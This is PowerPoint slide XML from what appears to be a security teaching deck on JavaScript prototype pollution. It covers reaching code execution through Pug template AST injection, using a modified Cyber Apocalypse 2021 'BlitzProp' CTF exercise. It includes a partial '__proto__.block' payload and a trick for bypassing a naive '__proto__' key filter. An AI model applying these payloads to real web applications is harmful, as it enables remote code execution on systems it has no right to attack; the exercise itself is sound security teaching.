          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="5655593" y="2833195"/>
              <a:ext cx="546606" cy="587851"/>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C1473979-60F1-E952-1CAE-D7E5BA8A4A4C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="9" idx="2"/>
              <a:endCxn id="11" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="7718763" y="3246600"/>
              <a:ext cx="141405" cy="4499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CD396057-30EB-647D-B9CD-FDCBB9B16878}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="7" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2406562" y="3198394"/>
              <a:ext cx="423103" cy="22265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371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What is JavaScript?</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A programming language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>EMCAScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Most intuitive language ever</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Has nothing to do with Java</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US"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219193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dirty="0"/>
              <a:t>Finding gadgets: arbitrary code execution</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US"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Continuing with Cyber Apocalypse 2021/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>BlitzProp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> [1] and examining the dependencies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Pug is a templating engine that can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>run code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> [2]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Many templating engines can run arbitrary code, e.g. handlebars [3], EJS [4] (extends to other languages as well)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="158750" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'response'</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pug</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compile</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'span Hello #{user}, thank you for letting us know!'</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user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'guest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>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endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>We pollute the global object prototype with some Pug AST to execute arbitrary code [3]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;!--</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node_modules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>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pug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>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code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>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gen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>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index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>js</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--&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</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debug</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&amp;&amp;</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debug</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B58900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>false</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&amp;&amp;</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type</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'Block'</a:t>
            </a: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if</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line</a:t>
            </a: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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="586E75"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</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js</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pug_debug_line</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = '</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line</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if</a:t>
            </a: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filename</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js</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pug_debug_filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = '</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68BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stringify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">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node</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filename</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r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>this</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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0" err="1">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push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>';'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="900" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Payload (relevant part only) [1]:  </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"__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proto__.block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>type</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"Text"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>line</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"(code here)"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> } }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12DBD039-B24A-1C7A-D0A5-B35D18A81E9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4558676"/>
            <a:ext cx="6434807" cy="584775"/>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https://ctftime.org/writeup/28035</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://pugjs.org/language/code.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://web.archive.org/web/20201109113214/https://blog.p6.is/AST-Injection/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://blog.huli.tw/2023/06/22/ejs-render-vulnerability-ctf/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5099878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sz="2400" dirty="0"/>
              <a:t>Finding gadgets: Cyber Apocalypse 2021/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2400" dirty="0" err="1"/>
              <a:t>BlitzProp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="2400"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Let’s try doing a modified version of Cyber Apocalypse 2021/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>BlitzProp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> [1]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Start the server by running “node ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1"/>
              <a:t>finding_gadgets.mjs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>” and navigate to “/” to check if it is running</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>The challenge is under “/song”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Hint: There are 2 aspects of the payload to modify (apart from the song name, obviously)</a:t>
            </a:r>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
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12DBD039-B24A-1C7A-D0A5-B35D18A81E9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4922939"/>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https://ctftime.org/writeup/28035</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421885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sz="2200" dirty="0"/>
              <a:t>Finding gadgets: Cyber Apocalypse 2021/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2200" dirty="0" err="1"/>
              <a:t>BlitzProp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2200" dirty="0"/>
              <a:t> 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="2200"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Two key modifications from the original CTF challenge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>We “patched” the prototype pollution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</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key</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startsWith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"__proto__"</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859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>req</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body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="93A1A1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// No naughty allowed!!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Quite easy to bypass, use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>any_text_here.__proto__.block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proto__.block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2AA198"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="657B83"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>The key is in the memory instead of a file, and a seemingly useless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>authors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> is added</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Not useless for us though, we can perform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" i="1" dirty="0"/>
              <a:t>another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> prototype pollution inside the code that will be arbitrarily-executed to move the in-memory flag to the prototype of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>authors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Then the flag will be outputted on next request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Note that we cannot move the in-memory flag in the first prototype pollution because we can only pass a static object to the HTTP request</a:t>
            </a:r>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656578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sz="2200" dirty="0"/>
              <a:t>Finding gadgets: Cyber Apocalypse 2021/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2200" dirty="0" err="1"/>
